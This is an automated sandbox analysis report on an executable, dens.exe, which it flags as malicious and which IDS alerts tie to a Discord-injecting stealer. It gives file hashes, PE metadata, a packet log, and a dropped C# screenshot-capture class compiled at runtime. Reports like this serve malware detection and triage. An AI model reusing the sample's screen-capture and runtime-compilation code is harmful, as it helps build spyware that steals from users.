                                                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                            File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1004
                                                                                                                                                                                                                                            Entropy (8bit):4.154581034278981
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:Jo4KMz04F03wykl4qk6oAuBGOUBrRmLW+7UCPa:Jo4hz0BAl4xBQ0XQCC
                                                                                                                                                                                                                                            MD5:C76055A0388B713A1EABE16130684DC3
                                                                                                                                                                                                                                            SHA1:EE11E84CF41D8A43340F7102E17660072906C402
                                                                                                                                                                                                                                            SHA-256:8A3CD008E86A3D835F55F8415F5FD264C6DACDF0B7286E6854EA3F5A363390E7
                                                                                                                                                                                                                                            SHA-512:22D2804491D90B03BB4B640CB5E2A37D57766C6D82CAF993770DCF2CF97D0F07493C870761F3ECEA15531BD434B780E13AE065A1606681B32A77DBF6906FB4E2
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:.using System;..using System.Collections.Generic;..using System.Drawing;..using System.Windows.Forms;....public class Screenshot..{.. public static List<Bitmap> CaptureScreens().. {.. var results = new List<Bitmap>();.. var allScreens = Screen.AllScreens;.... foreach (Screen screen in allScreens).. {.. try.. {.. Rectangle bounds = screen.Bounds;.. using (Bitmap bitmap = new Bitmap(bounds.Width, bounds.Height)).. {.. using (Graphics graphics = Graphics.FromImage(bitmap)).. {.. graphics.CopyFromScreen(new Point(bounds.Left, bounds.Top), Point.Empty, bounds.Size);.. }.... results.Add((Bitmap)bitmap.Clone());.. }.. }.. catch (Exception).. {.. // Handle any exceptions here.. }.. }.... return results;..
                                                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                            File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (604), with no line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):607
                                                                                                                                                                                                                                            Entropy (8bit):5.352580405813052
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:12:p37Lvkmb6KOkqe1xBkrk+ikOfhXUWZEifhXR:V3ka6KOkqeFkOfx1EifxR
                                                                                                                                                                                                                                            MD5:9E3513A9368D09B95BCB5D7CAFDB6BDB
                                                                                                                                                                                                                                            SHA1:79EFAEF45A731624225FD12007231EB5E7542DD3
                                                                                                                                                                                                                                            SHA-256:87528BB9157254DC0C54D3F76098E6915ACF4CA355FB8D7FCDF67B1AF9E9A747
                                                                                                                                                                                                                                            SHA-512:50778BCF7578E5B92F29230BD8B31BD86E0B3ECCB607D792ADB763E8100916A7638F2497A967B1259C7D449B85EFFAD65CC2C914DB8BBD6AE82BC9AC03F3DC96
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll" /out:"C:\Users\user\AppData\Local\Temp\mugnbzbx\mugnbzbx.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\mugnbzbx\mugnbzbx.0.cs"
                                                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                            File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (734), with CRLF, CR line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1155
                                                                                                                                                                                                                                            Entropy (8bit):5.480066177032836
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:KJfUId3ka6KOkqeFkOfx1Eifx0Kax5DqBVKVrdFAMBJTH:uUkka6NkqeFkyx1Eux0K2DcVKdBJj
                                                                                                                                                                                                                                            MD5:787277F9BB7E62446B7AC777EC08EB81
                                                                                                                                                                                                                                            SHA1:AC58A48A8BB9D257F8EE292235926517B4CAAA35
                                                                                                                                                                                                                                            SHA-256:ED7D0B2396E0B478CDB982DDF5ED454501BFF45850DCFA6A9A9ECF1B2E954126
                                                                                                                                                                                                                                            SHA-512:A8A8752DD63372D7FE42DF91513E85948780A7A47E76F7F25E03BB2BEE867F7931CAE8E0C215C36144576564E3EEE7658A856D0006C43734F010B7AC08014772
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:.C:\Users\user\AppData\Local\Temp\71434D56-1548-ED3D-AEE6-C75AECD93BF0> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll" /out:"C:\Users\user\AppData\Local\Temp\mugnbzbx\mugnbzbx.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\mugnbzbx\mugnbzbx.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):16905542
                                                                                                                                                                                                                                            Entropy (8bit):7.996534016135247
                                                                                                                                                                                                                                            Encrypted:true
                                                                                                                                                                                                                                            SSDEEP:393216:ImyCi6hZ2YsHFUK2JjXMCHWUjtjx5WsqWxTC0xQwe8les+j:1yCi+Z2YwUlJjXMb8AsqACj3Qes
                                                                                                                                                                                                                                            MD5:258322C37F4F5C632BD6C79520899603
                                                                                                                                                                                                                                            SHA1:F7971D8FEF96C59DF97A2B31436CC0C1F8921182
                                                                                                                                                                                                                                            SHA-256:09B67CCD7D38D2F868EB2A67C73E2E8D45AEFE1054522477B259C399527B2C39
                                                                                                                                                                                                                                            SHA-512:BFAF83D01607C5D481F6AA0415E243C91A28F84F595C65F76EF6B9291CCCC8D58D02F114B3D30CB24D6FA5E8D2ED6013A2609715344739946DCCED07B7BABEBC
                                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 39%
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):32768
                                                                                                                                                                                                                                            Entropy (8bit):0.017262956703125623
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                                                                                                                                                                                                            MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                                                                                                                                                                                                            SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                                                                                                                                                                                                            SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                                                                                                                                                                                                            SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):32768
                                                                                                                                                                                                                                            Entropy (8bit):0.017262956703125623
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                                                                                                                                                                                                            MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                                                                                                                                                                                                            SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                                                                                                                                                                                                            SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                                                                                                                                                                                                            SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):55
                                                                                                                                                                                                                                            Entropy (8bit):4.306461250274409
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                                                                                                                                                                            MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                                                                                                                                                                            SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                                                                                                                                                                            SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                                                                                                                                                                            SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
                                                                                                                                                                                                                                            File type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                            Entropy (8bit):7.996534016135247
                                                                                                                                                                                                                                            TrID:
                                                                                                                                                                                                                                            • Win64 Executable GUI (202006/5) 77.37%
                                                                                                                                                                                                                                            • InstallShield setup (43055/19) 16.49%
                                                                                                                                                                                                                                            • Win64 Executable (generic) (12005/4) 4.60%
                                                                                                                                                                                                                                            • Generic Win/DOS Executable (2004/3) 0.77%
                                                                                                                                                                                                                                            • DOS Executable Generic (2002/1) 0.77%
                                                                                                                                                                                                                                            File name:dens.exe
                                                                                                                                                                                                                                            File size:16'905'542 bytes
                                                                                                                                                                                                                                            MD5:258322c37f4f5c632bd6c79520899603
                                                                                                                                                                                                                                            SHA1:f7971d8fef96c59df97a2b31436cc0c1f8921182
                                                                                                                                                                                                                                            SHA256:09b67ccd7d38d2f868eb2a67c73e2e8d45aefe1054522477b259c399527b2c39
                                                                                                                                                                                                                                            SHA512:bfaf83d01607c5d481f6aa0415e243c91a28f84f595c65f76ef6b9291cccc8d58d02f114b3d30cb24d6fa5e8d2ed6013a2609715344739946dcced07b7babebc
                                                                                                                                                                                                                                            SSDEEP:393216:ImyCi6hZ2YsHFUK2JjXMCHWUjtjx5WsqWxTC0xQwe8les+j:1yCi+Z2YwUlJjXMb8AsqACj3Qes
                                                                                                                                                                                                                                            TLSH:8807334467F128E9D9EF403D9A97D569EA73B84A1FF5C24FC79C02920E331A41E39B21
                                                                                                                                                                                                                                            Icon Hash:6989b5a1a1a5a1a1
                                                                                                                                                                                                                                            Entrypoint:0x14000cdb0
                                                                                                                                                                                                                                            Entrypoint Section:.text
                                                                                                                                                                                                                                            Digitally signed:false
                                                                                                                                                                                                                                            Imagebase:0x140000000
                                                                                                                                                                                                                                            Subsystem:windows gui
                                                                                                                                                                                                                                            Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                                                                                                                                                                            DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                            Time Stamp:0x670EF04D [Tue Oct 15 22:44:29 2024 UTC]
                                                                                                                                                                                                                                            TLS Callbacks:
                                                                                                                                                                                                                                            CLR (.Net) Version:
                                                                                                                                                                                                                                            OS Version Major:6
                                                                                                                                                                                                                                            OS Version Minor:0
                                                                                                                                                                                                                                            File Version Major:6
                                                                                                                                                                                                                                            File Version Minor:0
                                                                                                                                                                                                                                            Subsystem Version Major:6
                                                                                                                                                                                                                                            Subsystem Version Minor:0
                                                                                                                                                                                                                                            Import Hash:72c4e339b7af8ab1ed2eb3821c98713a
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x3ca5c | 0x78 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x47000 | 0x178c | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x44000 | 0x2250 | .pdata
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x49000 | 0x764 | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x3a080 | 0x1c | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x39f40 | 0x140 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2b000 | 0x4a0 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x29f00 | 0x2a000 | a6c3b829cc8eaabb1a474c227e90407f | False | 0.5514206659226191 | data | 6.487493643901088 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x2b000 | 0x12a50 | 0x12c00 | c9531b03ddf41861eeda142139c6800d | False | 0.52453125 | data | 5.752790286973688 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x3e000 | 0x53f8 | 0xe00 | dba0caeecab624a0ccc0d577241601d1 | False | 0.134765625 | data | 1.8392217063172436 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.pdata | 0x44000 | 0x2250 | 0x2400 | 181312260a85d10a1454ba38901c499b | False | 0.4705946180555556 | data | 5.290347578351011 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc | 0x47000 | 0x178c | 0x1800 | bd909864baf5b29ccc61cfa977b8e075 | False | 0.8546549479166666 | data | 7.566407732829443 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x49000 | 0x764 | 0x800 | 816c68eeb419ee2c08656c31c06a0fff | False | 0.5576171875 | data | 5.2809528666624175 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0x470e8 | 0x1180 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | | | 0.9837053571428571
RT_GROUP_ICON | 0x48268 | 0x14 | data | | | 1.05
RT_MANIFEST | 0x4827c | 0x50d | XML 1.0 document, ASCII text | | | 0.4694508894044857
DLL | Import
USER32.dll | CreateWindowExW, ShutdownBlockReasonCreate, MsgWaitForMultipleObjects, ShowWindow, DestroyWindow, RegisterClassW, DefWindowProcW, PeekMessageW, DispatchMessageW, TranslateMessage, PostMessageW, GetMessageW, MessageBoxW, MessageBoxA, SystemParametersInfoW, DestroyIcon, SetWindowLongPtrW, GetWindowLongPtrW, GetClientRect, InvalidateRect, ReleaseDC, GetDC, DrawTextW, GetDialogBaseUnits, EndDialog, DialogBoxIndirectParamW, MoveWindow, SendMessageW
COMCTL32.dll |
KERNEL32.dll | GetACP, IsValidCodePage, GetStringTypeW, GetFileAttributesExW, SetEnvironmentVariableW, FlushFileBuffers, GetCurrentDirectoryW, LCMapStringW, CompareStringW, FlsFree, GetOEMCP, GetCPInfo, GetModuleHandleW, MulDiv, FormatMessageW, GetLastError, GetModuleFileNameW, LoadLibraryExW, SetDllDirectoryW, CreateSymbolicLinkW, GetProcAddress, GetEnvironmentStringsW, GetCommandLineW, GetEnvironmentVariableW, ExpandEnvironmentStringsW, DeleteFileW, FindClose, FindFirstFileW, FindNextFileW, GetDriveTypeW, RemoveDirectoryW, GetTempPathW, CloseHandle, QueryPerformanceCounter, QueryPerformanceFrequency, WaitForSingleObject, Sleep, GetCurrentProcess, TerminateProcess, GetExitCodeProcess, CreateProcessW, GetStartupInfoW, FreeLibrary, LocalFree, SetConsoleCtrlHandler, K32EnumProcessModules, K32GetModuleFileNameExW, CreateFileW, FindFirstFileExW, GetFinalPathNameByHandleW, MultiByteToWideChar, WideCharToMultiByte, FlsSetValue, FreeEnvironmentStringsW, GetProcessHeap, GetTimeZoneInformation, HeapSize, HeapReAlloc, WriteConsoleW, SetEndOfFile, CreateDirectoryW, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsProcessorFeaturePresent, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, RtlUnwindEx, SetLastError, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, EncodePointer, RaiseException, RtlPcToFileHeader, GetCommandLineA, GetFileInformationByHandle, GetFileType, PeekNamedPipe, SystemTimeToTzSpecificLocalTime, FileTimeToSystemTime, ReadFile, GetFullPathNameW, SetStdHandle, GetStdHandle, WriteFile, ExitProcess, GetModuleHandleExW, HeapFree, GetConsoleMode, ReadConsoleW, SetFilePointerEx, GetConsoleOutputCP, GetFileSizeEx, HeapAlloc, FlsAlloc, FlsGetValue
ADVAPI32.dll | OpenProcessToken, GetTokenInformation, ConvertStringSecurityDescriptorToSecurityDescriptorW, ConvertSidToStringSidW
GDI32.dll | SelectObject, DeleteObject, CreateFontIndirectW
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-11-13T00:38:46.672880+0100 | 2022930 | ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow | 1 | 4.175.87.197 | 443 | 192.168.2.4 | 49744 | TCP
2024-11-13T00:38:58.408138+0100 | 2857287 | ETPRO MALWARE Python Cstealer/SatanStealer Discord JS Inject Inbound | 1 | 185.199.108.133 | 443 | 192.168.2.4 | 49757 | TCP
2024-11-13T00:39:26.467794+0100 | 2022930 | ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow | 1 | 4.175.87.197 | 443 | 192.168.2.4 | 49763 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                                                                                                                                                            Nov 13, 2024 00:38:56.198719025 CET49754443192.168.2.4162.159.138.232
                                                                                                                                                                                                                                            Nov 13, 2024 00:38:56.198760986 CET44349754162.159.138.232192.168.2.4
                                                                                                                                                                                                                                            Nov 13, 2024 00:38:56.198782921 CET49754443192.168.2.4162.159.138.232
                                                                                                                                                                                                                                            Nov 13, 2024 00:38:56.198821068 CET49754443192.168.2.4162.159.138.232
                                                                                                                                                                                                                                            Nov 13, 2024 00:38:56.198843956 CET49754443192.168.2.4162.159.138.232
                                                                                                                                                                                                                                            Nov 13, 2024 00:38:56.198925972 CET49754443192.168.2.4162.159.138.232
                                                                                                                                                                                                                                            Nov 13, 2024 00:38:56.203382969 CET44349754162.159.138.232192.168.2.4
                                                                                                                                                                                                                                            Nov 13, 2024 00:38:56.203766108 CET49754443192.168.2.4162.159.138.232
                                                                                                                                                                                                                                            Nov 13, 2024 00:38:56.203774929 CET44349754162.159.138.232192.168.2.4
                                                                                                                                                                                                                                            Nov 13, 2024 00:38:57.068563938 CET44349754162.159.138.232192.168.2.4
                                                                                                                                                                                                                                            Nov 13, 2024 00:38:57.068619967 CET44349754162.159.138.232192.168.2.4
                                                                                                                                                                                                                                            Nov 13, 2024 00:38:57.068676949 CET49754443192.168.2.4162.159.138.232
                                                                                                                                                                                                                                            Nov 13, 2024 00:38:57.075758934 CET49754443192.168.2.4162.159.138.232
                                                                                                                                                                                                                                            Nov 13, 2024 00:38:57.075774908 CET44349754162.159.138.232192.168.2.4
                                                                                                                                                                                                                                            Nov 13, 2024 00:38:57.379215956 CET49757443192.168.2.4185.199.108.133
                                                                                                                                                                                                                                            Nov 13, 2024 00:38:57.379240036 CET44349757185.199.108.133192.168.2.4
                                                                                                                                                                                                                                            Nov 13, 2024 00:38:57.379308939 CET49757443192.168.2.4185.199.108.133
                                                                                                                                                                                                                                            Nov 13, 2024 00:38:57.380291939 CET49757443192.168.2.4185.199.108.133
                                                                                                                                                                                                                                            Nov 13, 2024 00:38:57.380306005 CET44349757185.199.108.133192.168.2.4
                                                                                                                                                                                                                                            Nov 13, 2024 00:38:58.025985003 CET44349757185.199.108.133192.168.2.4
                                                                                                                                                                                                                                            Nov 13, 2024 00:38:58.026710987 CET49757443192.168.2.4185.199.108.133
                                                                                                                                                                                                                                            Nov 13, 2024 00:38:58.026741028 CET44349757185.199.108.133192.168.2.4
                                                                                                                                                                                                                                            Nov 13, 2024 00:38:58.027622938 CET44349757185.199.108.133192.168.2.4
                                                                                                                                                                                                                                            Nov 13, 2024 00:38:58.027678013 CET49757443192.168.2.4185.199.108.133
                                                                                                                                                                                                                                            Nov 13, 2024 00:38:58.029443979 CET49757443192.168.2.4185.199.108.133
                                                                                                                                                                                                                                            Nov 13, 2024 00:38:58.029510021 CET44349757185.199.108.133192.168.2.4
                                                                                                                                                                                                                                            Nov 13, 2024 00:38:58.029915094 CET49757443192.168.2.4185.199.108.133
                                                                                                                                                                                                                                            Nov 13, 2024 00:38:58.029922962 CET44349757185.199.108.133192.168.2.4
                                                                                                                                                                                                                                            Nov 13, 2024 00:38:58.083302021 CET49757443192.168.2.4185.199.108.133
                                                                                                                                                                                                                                            Nov 13, 2024 00:38:58.282216072 CET44349757185.199.108.133192.168.2.4
                                                                                                                                                                                                                                            Nov 13, 2024 00:38:58.282299995 CET44349757185.199.108.133192.168.2.4
                                                                                                                                                                                                                                            Nov 13, 2024 00:38:58.282330036 CET44349757185.199.108.133192.168.2.4
                                                                                                                                                                                                                                            Nov 13, 2024 00:38:58.282371044 CET44349757185.199.108.133192.168.2.4
                                                                                                                                                                                                                                            Nov 13, 2024 00:38:58.282401085 CET49757443192.168.2.4185.199.108.133
                                                                                                                                                                                                                                            Nov 13, 2024 00:38:58.282424927 CET44349757185.199.108.133192.168.2.4
                                                                                                                                                                                                                                            Nov 13, 2024 00:38:58.282455921 CET49757443192.168.2.4185.199.108.133
                                                                                                                                                                                                                                            Nov 13, 2024 00:38:58.282465935 CET44349757185.199.108.133192.168.2.4
                                                                                                                                                                                                                                            Nov 13, 2024 00:38:58.283170938 CET44349757185.199.108.133192.168.2.4
                                                                                                                                                                                                                                            Nov 13, 2024 00:38:58.283186913 CET49757443192.168.2.4185.199.108.133
                                                                                                                                                                                                                                            Nov 13, 2024 00:38:58.283194065 CET44349757185.199.108.133192.168.2.4
                                                                                                                                                                                                                                            Nov 13, 2024 00:38:58.283260107 CET44349757185.199.108.133192.168.2.4
                                                                                                                                                                                                                                            Nov 13, 2024 00:38:58.283277988 CET49757443192.168.2.4185.199.108.133
                                                                                                                                                                                                                                            Nov 13, 2024 00:38:58.283286095 CET44349757185.199.108.133192.168.2.4
                                                                                                                                                                                                                                            Nov 13, 2024 00:38:58.283365965 CET49757443192.168.2.4185.199.108.133
                                                                                                                                                                                                                                            Nov 13, 2024 00:38:58.406343937 CET44349757185.199.108.133192.168.2.4
                                                                                                                                                                                                                                            Nov 13, 2024 00:38:58.406428099 CET44349757185.199.108.133192.168.2.4
                                                                                                                                                                                                                                            Nov 13, 2024 00:38:58.406457901 CET44349757185.199.108.133192.168.2.4
                                                                                                                                                                                                                                            Nov 13, 2024 00:38:58.406526089 CET44349757185.199.108.133192.168.2.4
                                                                                                                                                                                                                                            Nov 13, 2024 00:38:58.406548023 CET49757443192.168.2.4185.199.108.133
                                                                                                                                                                                                                                            Nov 13, 2024 00:38:58.406557083 CET44349757185.199.108.133192.168.2.4
                                                                                                                                                                                                                                            Nov 13, 2024 00:38:58.406584024 CET49757443192.168.2.4185.199.108.133
                                                                                                                                                                                                                                            Nov 13, 2024 00:38:58.407083035 CET44349757185.199.108.133192.168.2.4
                                                                                                                                                                                                                                            Nov 13, 2024 00:38:58.407110929 CET44349757185.199.108.133192.168.2.4
                                                                                                                                                                                                                                            Nov 13, 2024 00:38:58.407138109 CET44349757185.199.108.133192.168.2.4
                                                                                                                                                                                                                                            Nov 13, 2024 00:38:58.407138109 CET49757443192.168.2.4185.199.108.133
                                                                                                                                                                                                                                            Nov 13, 2024 00:38:58.407147884 CET44349757185.199.108.133192.168.2.4
                                                                                                                                                                                                                                            Nov 13, 2024 00:38:58.407404900 CET49757443192.168.2.4185.199.108.133
                                                                                                                                                                                                                                            Nov 13, 2024 00:38:58.407854080 CET44349757185.199.108.133192.168.2.4
                                                                                                                                                                                                                                            Nov 13, 2024 00:38:58.407928944 CET49757443192.168.2.4185.199.108.133
                                                                                                                                                                                                                                            Nov 13, 2024 00:38:58.407932997 CET44349757185.199.108.133192.168.2.4
                                                                                                                                                                                                                                            Nov 13, 2024 00:38:58.407970905 CET44349757185.199.108.133192.168.2.4
                                                                                                                                                                                                                                            Nov 13, 2024 00:38:58.408000946 CET44349757185.199.108.133192.168.2.4
                                                                                                                                                                                                                                            Nov 13, 2024 00:38:58.408051014 CET44349757185.199.108.133192.168.2.4
                                                                                                                                                                                                                                            Nov 13, 2024 00:38:58.408080101 CET49757443192.168.2.4185.199.108.133
                                                                                                                                                                                                                                            Nov 13, 2024 00:38:58.408139944 CET49757443192.168.2.4185.199.108.133
                                                                                                                                                                                                                                            Nov 13, 2024 00:38:58.408411980 CET49757443192.168.2.4185.199.108.133
                                                                                                                                                                                                                                            Nov 13, 2024 00:38:58.408422947 CET44349757185.199.108.133192.168.2.4
                                                                                                                                                                                                                                            Nov 13, 2024 00:39:00.198374987 CET49760443192.168.2.445.112.123.126
                                                                                                                                                                                                                                            Nov 13, 2024 00:39:00.198410988 CET4434976045.112.123.126192.168.2.4
                                                                                                                                                                                                                                            Nov 13, 2024 00:39:00.198482037 CET49760443192.168.2.445.112.123.126
                                                                                                                                                                                                                                            Nov 13, 2024 00:39:00.199048996 CET49760443192.168.2.445.112.123.126
                                                                                                                                                                                                                                            Nov 13, 2024 00:39:00.199062109 CET4434976045.112.123.126192.168.2.4
                                                                                                                                                                                                                                            Nov 13, 2024 00:39:01.051076889 CET4434976045.112.123.126192.168.2.4
                                                                                                                                                                                                                                            Nov 13, 2024 00:39:01.051676989 CET49760443192.168.2.445.112.123.126
                                                                                                                                                                                                                                            Nov 13, 2024 00:39:01.051703930 CET4434976045.112.123.126192.168.2.4
                                                                                                                                                                                                                                            Nov 13, 2024 00:39:01.052594900 CET4434976045.112.123.126192.168.2.4
                                                                                                                                                                                                                                            Nov 13, 2024 00:39:01.052660942 CET49760443192.168.2.445.112.123.126
                                                                                                                                                                                                                                            Nov 13, 2024 00:39:01.054028988 CET49760443192.168.2.445.112.123.126
                                                                                                                                                                                                                                            Nov 13, 2024 00:39:01.054085970 CET4434976045.112.123.126192.168.2.4
                                                                                                                                                                                                                                            Nov 13, 2024 00:39:01.054356098 CET49760443192.168.2.445.112.123.126
                                                                                                                                                                                                                                            Nov 13, 2024 00:39:01.054363012 CET4434976045.112.123.126192.168.2.4
                                                                                                                                                                                                                                            Nov 13, 2024 00:39:01.098707914 CET49760443192.168.2.445.112.123.126
                                                                                                                                                                                                                                            Nov 13, 2024 00:39:01.370937109 CET4434976045.112.123.126192.168.2.4
                                                                                                                                                                                                                                            Nov 13, 2024 00:39:01.371006012 CET4434976045.112.123.126192.168.2.4
                                                                                                                                                                                                                                            Nov 13, 2024 00:39:01.371072054 CET49760443192.168.2.445.112.123.126
